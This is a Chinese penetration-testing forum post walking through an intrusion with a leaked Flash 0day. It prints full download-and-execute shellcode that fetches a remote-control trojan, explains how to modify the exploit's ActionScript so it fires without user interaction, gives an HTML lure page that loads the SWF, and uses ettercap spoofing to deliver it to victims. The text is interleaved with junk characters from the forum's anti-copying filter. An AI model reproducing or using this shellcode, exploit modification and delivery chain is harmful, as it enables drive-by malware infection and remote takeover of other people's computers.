中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

, {( i8 K! A' I! \8 y( a 三、flash 0day之手工代码修改制作下载者实例入侵演示 * `+ t/ ^% [0 Z; t% ?) ~5 R

1 ~# l8 R2 `; n; e" x4 p3 ]

0 j3 @0 x9 O0 U2 i 利用到的工具: 5 Y) `' m+ v9 ~, j0 Y/ r

6 n* G* n9 i0 i

0 w' |8 ~7 {. _ Msf 1 |# p* N0 h8 w; E5 Y" O

6 m G5 k4 f4 t* s- Y! `. ~

0 W( h6 r4 S# J# Q [ Ettercap ! ~# V+ Z& `0 e& z5 z( O- x% y

3 r" @) b4 e, U" `( Y

3 h; K+ L' x+ A Adobe Flash CS6 9 o; E" I2 \; l! r

) U; i1 p+ ?9 I% A( l* k: D! y5 m

* t- u4 x3 g+ P6 E% [ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 p- E% H, T/ V+ U( H& n& n3 e5 w

N u' k4 b& I6 Y: v

4 q: w! |. Y- g3 X+ @) o 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options , }' O- N0 A1 ^. e- P' F

4 }4 T$ X! |7 o8 C& F! O7 h. l7 S

" w* s" K/ u# U4 a+ T 如图: # X) @& i! B7 f

% ]5 \) R' |* e/ @3 F

& }: k3 g5 y+ V5 r& m* P* F( I   ) P& h1 k k- m" h5 J( N

2 Y& O/ c, R' d8 p' C/ R

! L @6 p+ ?. u& U! z0 G x, t# `   8 f/ i; \, c7 ]

) f* K* r# m& l+ | q$ q! y

: F4 g: K' k7 x6 d9 {1 a 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + {4 ]) d( c! Y w" U

; [, x1 m3 J( Q2 O

% C0 p- B6 R2 h   ( M( }- W9 L3 [1 h" ^2 }% \$ O

& K1 n: `7 d! a# I2 T6 ~& {* T0 O

+ ^; |5 L8 t; B2 V   % v: S- N/ r5 a

' n+ [- @3 t {' i

4 u4 N: @& q+ F: @: Y. n9 Y5 B+ V+ f, x 然后执行generate -t dword生成shellcode,如下: 5 ]5 ^# \6 u: W. x2 {

% p, L; P: j/ Z8 m7 o0 ~

4 w9 O# U( o( i( T( l( s) ^- a   3 O3 T3 i1 `' H: |

( }$ T$ R- I) n& @

8 o5 o5 S8 A' Z4 ^ 复制代码到文本下便于我们一会编辑flash exp,如下: , X w' _0 s5 u0 n/ s6 w1 @+ e

! {( s7 a2 ^1 a1 H0 s

0 P) D5 `. c: R. q- W' r2 J 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 5 y7 y4 g) Z- @7 q( t4 X% R

# b- R) q" m' E0 s; Q

- Y7 I* L5 n" T5 y1 k0 E 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' S& C- [8 D" I) G% G/ ?

# _0 K0 }, v+ b; L5 G; r) T

6 m$ L% M& a2 A6 k X/ u6 q 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 5 [( J) `* n! C K2 v

2 O: z) k0 L, D( u7 H1 \. u# }

w9 D, H: X# S4 Z; Q) O 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, , N s) y2 v6 b8 P- B) g; ?) ?

& A: W% c0 `# i8 r% e# a! ^2 U4 ^

5 U" J1 y: p3 ^0 G6 A0 A+ ` 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / N5 ^7 z% t& |, k' r2 w) t! m

# F0 C; V# N) v, d. G N$ v+ I

- T8 @+ p4 A. l/ q# G* L 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 1 l* t/ g2 o7 _6 ~7 F& b& X

4 r+ Z' }; G; W: u( |

0 Y+ Q9 C6 p: B7 g+ a. ` 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, - u, c: `7 ^8 ?7 G; }

' V) A ?; c6 {3 q% U

1 a8 f) `! h' B% Q2 E 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, % q7 ?' l4 {7 ~6 _7 f. M# l; `$ W

) @' \4 C& [3 c3 q' p3 \

" G$ Z, T+ v0 d 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 0 W! z6 S& N0 m; Y3 U

2 X9 X* q. |, V$ i/ n% K1 N) c8 @

- N; D A N1 U) Y( X- v 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ; |, M7 Q7 B% n0 _; M

# Q8 }: S# d) G0 H) f$ P

7 ~9 V9 x5 Q) Z/ L 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ! {) B) E: H, O8 m7 k

. V, @0 ^5 Z: u

% _/ T- e( S$ h 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 5 r$ w2 l8 i( u1 g5 N1 v

( ~0 I/ d1 G4 S+ \+ k

1 R- ] m6 D% I6 M) S3 Y8 Q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, " S2 Z4 E; S. s8 f

2 \' D* e' u. q: u) ^9 r

& W' o. y9 B, P3 M$ Q5 g f 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ( r7 j& L+ S: ]; H* T2 ~( N

" R+ i q3 A. R6 n8 E+ r

' |. w7 M' t- |5 d! V8 J0 w" W! e; ]   % r6 U6 {$ j8 r) H; L |& K

/ J9 N! s. U9 g! E" |

& v# q2 e( P: T7 I% R   , w8 k/ Y6 R( e9 G+ @5 N5 j2 \4 Y8 u

9 u5 v* C( P; d/ ]/ Z. }( ] m

) X# q6 m+ h- D$ |# s, I8 v 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 4 h! B) ]' o+ v/ x7 | j7 E# x, H5 D

. l% n5 `, _4 G0 S" r, C& c+ c' O; n

; X3 n0 _; b/ H0 m# h! j3 x! w* ~2 C5 q   8 ?% H q) }- j1 ?4 ]

) q+ Y1 l' Q+ p$ f q; _, a

+ _: L- E$ L' b3 t1 f8 [5 H 先修改ShellWin32.as,部分源代码如图: " s) Z4 {1 e0 e" M* r* h5 ^7 N

0 S/ i0 ~( W& C- G# X) m: S" R

) g! n, ]- u$ [6 R% T& c   & C: x" ^5 f4 L, x- o

. q3 i/ U1 T' o2 S5 I

" |8 {1 P" p& e; E* S8 v! \ 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 6 T+ _1 J# F; K& V4 m2 W( h

& j$ o) A/ i: Y# n! @

5 w7 U0 y& z- C' w$ H1 _! v   3 N- \' d+ o0 o7 o* ?4 _

8 ^3 k( M3 i& N. P

+ w1 ^* B6 r* P* R$ M8 u2 T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - k; j& X# A- {% ` S) L

6 I3 t, q4 ~1 G" I) [; M) k

# w0 F9 j4 B! f   . D* N6 D- w% d% V) C' f

2 b) \! F1 U4 M8 F3 B% y1 c7 C

1 @# \& r2 l: g$ P5 Y7 Q 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 0 Z! o7 G) s1 j& b$ |& V

+ q0 V! U/ c& c

0 y/ _1 G ?; B# _6 Z   3 g6 y' {" f) g, a; a& c

& V; R. E: Q f9 z) O; [2 E

3 q0 d& N7 Z; t" k" _" J8 V   6 v# O! f( C8 s' r

4 Y/ L1 y/ b3 r. t2 y/ B

" X+ J2 Q$ q% s! M6 X! M& G   4 u5 T; R: h6 ^2 @

' z. h6 K' M$ @( g

3 m0 Y" J. w- j4 \% d* Z 然后点保存,下面我们来编译一下,打开 / X- F3 n- f/ Y2 M; v) T& y4 |6 M

2 U0 G! \$ Y- r

" S" m8 x( u/ `! Y exp1.fla然后点文件-发布,看看编译没错误 . |9 K6 M0 i3 J" n+ ^& T

* D6 @+ n- J2 I3 |2 Y

8 r/ [7 o! `3 I9 e   ; W* f" m. o& P/ S' S

/ z" Q3 g! F. g

9 b* W/ S/ J* p/ n( b! B$ f q* Z. F   ) M& Z7 i, A' X; J1 W$ w3 W9 H

3 D, W8 i4 X1 S

! |0 o' z' |2 O0 j0 r   : G6 G( f2 a# n6 o+ P. _

6 c# ~. A. M" G' r

* [8 B" T4 @- O   " W4 y8 q* e5 ^/ |! E$ {

$ L/ ] P* N, a2 U) c) U

! w. m# H5 z% J- p 然后我们把生成的 7 z& L; L+ s! Y0 _/ l

% B3 d- W0 p& K o8 k+ l# E% K

3 ~% m9 z; L, o& C3 X, O" Z( w/ R# Q. U exp1.swf丢到kailinux /var/www/html下: * q) ^) n& j H7 s

2 U: V2 g( ~, g3 _) }7 `

5 b+ c5 S+ f2 F, u! O3 d8 w$ C, a 然后把这段代码好好编辑一下 ) h& [% ^! M0 w' n1 S; ]

5 |0 s ?1 Y0 `6 W5 d

/ S; x2 v$ w; L5 _! C   4 ^/ U* F$ c6 n p" s! b

5 C) A$ w3 @9 Z, t0 [8 h

. d3 e, D. b8 R! Y6 W' A; Q" N   5 w/ [: I& D7 Y6 ^. r) x

% D k+ [: D& M

2 B6 V0 q: p5 V: c4 |- s; p   ' j* Y0 c# J: a! M. B% {( r' ^" v, d

( [, w1 l% G$ `- E L7 m

8 T6 O7 Z$ q7 R# u/ n" I0 b   3 C# G) |" F1 F

0 X" e- O; e0 B$ q( x, r

: V; q/ ]$ ~8 y( I) j, I! E G   ) u( e& N( E, A2 ]! k% W

, W1 C0 L) R/ ?+ j

( f4 [2 _; e4 U1 G& e   . M+ `: k& e* V1 W( A

$ X, `- C, I( y; E/ E$ G1 g

0 {0 j* J1 Q) D7 e/ E& D; ` <!DOCTYPE html> 5 W h5 n; j6 B& v0 c' u8 `. d- ^ Q

+ [5 y) g7 h$ I: W" k/ d3 t5 B

* q0 T Y9 C# r. j <html> ; p! g' i( v6 L2 L2 h, ~* J

& |$ ^3 n+ o! t0 p+ J

& j! P' y$ q% z <head> 0 s8 _) M! k' O: a

( w( t8 b, l1 G$ I' D

6 Y; ^) @4 B) H; z <meta http-equiv="Content-Type" content="text/html; $ a& }. u* r& Z4 E

+ `9 L& h B# H

" R; F8 F# W6 i5 [1 P" i charset=utf-8"/> + c# d) J( P: Q, N7 g. D( ]; M

8 C7 J0 ?7 E+ D( X+ W

& y% |+ |- H' l/ B4 l </head> ! v/ Y9 l: }: u7 b6 l0 i U

& B, ^ P5 ~$ Y: G# I+ {

( v7 ^5 Q9 d; |* J& N& d+ W, ^ <body> $ p" i1 L/ ]4 m

! p$ c9 `1 A! m2 W

' T: ]' H5 o+ m" }* c6 A <h2> Please wait, the requested page is loading...</h2> 6 ^) e" d8 t8 m" q; i: i( {

# x( S" p8 }$ @

! E! O( A+ E7 C( L+ Z! P <br> : B1 A* E6 ?9 Z+ k) A3 F

9 W8 c: l, `& X* b

% q: U) X& A) T4 A, r <OBJECT 6 \2 r) `& D' G2 K, D, `# e( a

; r5 w# F6 L+ z9 G6 `1 y4 W3 m

0 x! F. o+ v/ a- ]) ~; K2 A1 X) m classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie & q0 b0 e$ n. B0 x: N

6 @& t9 h/ S; I2 V6 X# \

, r. i' h5 O+ t3 _/ Q% T8 H VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 0 e5 U- J+ W! r% f' [0 \5 J9 L, U

3 {3 j6 s3 r' X. P: M; L

- `& Q) B9 c& |, m </body> ! \1 b5 A, @/ W. B1 Z

w4 ?8 g* k0 _+ J5 U3 o4 f

; u) f* E% Y5 U. S* | <script> 2 [: a! S W0 U% M# d

* a/ [# y ^+ u b# D# W

5 [! ?& {5 N8 t: F8 W6 b# H     setTimeout(function () { + Q) |- k+ O! _; c' C0 U$ v' v+ j

! C# v2 V y3 Q' z

# `2 ]- h7 E/ b          ( |, K2 L8 {9 J) z+ Z( n3 s2 r

* y4 M( m! W9 j1 S

$ P H- y6 X7 Z" E) K8 P" e( w window.location.reload(); 4 N$ F/ }; ]) U' Z" U

/ O0 y w6 }* D

$ f! d$ ^7 j8 q, S: y     }, 10000); 1 F6 u# Q( J/ O% e

/ @5 Q/ c$ u7 K( U' _

8 ^' g2 T9 r0 V   1 R+ T. s% r, ~( v6 z1 n. w

5 a8 Z! v0 R# c* ~" A5 ?

- d, l0 a7 H2 A) K, Q- y </script> ; y5 {1 h' P% e3 U! I, S

' c5 D3 k; [+ e

1 ?9 Y. U$ L3 D$ g( R, b </html> & v2 v2 \4 j6 r% J! i

}6 f7 e* A" i% U8 y7 Y, r

' k3 k) n! S: k" D   ; N2 F: r- E) V+ j/ i- o

% j$ G5 ?( \: q6 h6 h

* r+ ^2 i* r- @1 d$ N& B8 g7 ~ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 9 C# {% ^: F0 K. @ W& V% h! \2 w

; U; v7 ]6 ?0 X5 u

- @* g: ^" U Z4 {+ `   1 e8 V/ T% V0 r \

# f: a' s3 ~) f! v

( k: H. Q* n& v' }. n, G& ^   & ^" c* H0 J- S; {; A/ d5 Z9 x

3 m* z I. i9 F& s, f

2 T5 ~6 E- f" u+ ?4 [ n   - M2 A8 G } U0 [) b

" K! O X9 B1 p9 L% I Y

% e) M/ E# ~2 a7 Q   3 s& k# s0 ?) M( o5 w* K) N2 j

' H+ c1 G6 _4 U/ V; N# Q

1 D/ D, N; p0 K! ^+ S   3 r2 B ?, ?4 a3 Z2 h. A! U% p4 h

3 {8 Y" T: O/ l# u0 M6 [+ C' |

' }0 P( n: u: B; ?2 Y 下面我们用ettercap欺骗如图: 5 S5 F+ f7 O- q

E9 B0 a$ t2 u* Z' T

6 n8 G5 ?- X& n( x; ~) M4 x   * }+ Z" a( j* B4 M

3 k5 t! e5 _! [+ S. _* Q& P9 b' Z/ a

. J( t$ X' W/ m' U1 _! j( V1 S   c1 F9 w! x1 e9 Q+ Y d8 t* I

" w4 E3 D: `4 o3 R9 f5 v U

4 W: U( q" u9 l" }0 u, J 下面我们随便访问个网站看看: . z0 |" u5 s, @( N4 m. t8 I. p

( S/ B: I6 i+ T6 n C T9 N9 B

& x* l. n, C" g, f 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 9 G- E1 @' T% E1 f" M/ R* K

1 i7 }. @: [7 X& ~4 ^

0 o( W; L+ c$ u2 N5 X5 Z   7 B( K9 {* [/ L0 Q' ^7 E' p; B

( S- _: x D, C* r# @, c2 t/ g

' E; f c; z2 a+ d 我们看另一台, & ^/ T! ^9 e9 u0 C

3 T1 V, j; R5 x: d

: c: _4 y8 N0 q% q: S7 M 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 0 ~& V7 C3 N- f1 z; L+ t- `+ ~2 V9 [





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2